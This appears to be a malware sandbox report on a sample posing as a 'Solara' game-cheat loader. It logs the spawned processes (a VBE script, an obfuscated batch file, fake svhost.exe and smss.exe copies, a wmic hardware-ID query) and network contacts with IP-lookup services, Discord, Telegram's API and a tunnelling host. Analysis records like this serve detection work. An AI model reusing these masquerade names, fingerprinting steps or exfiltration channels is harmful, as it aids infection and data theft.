"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Roaming\svhost.exe.exe

"C:\Users\Admin\AppData\Roaming\svhost.exe.exe"

C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe

"C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Roaming\svhost.exe.exe

"C:\Users\Admin\AppData\Roaming\svhost.exe.exe"

C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe

"C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.129.233:443 discordapp.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.130.233:443 discordapp.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 answer-riverside.gl.at.ply.gg udp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.129.233:443 discordapp.com tcp
US 8.8.8.8:53 answer-riverside.gl.at.ply.gg udp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.129.233:443 discordapp.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 answer-riverside.gl.at.ply.gg udp
GB 172.217.16.227:443 gstatic.com tcp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
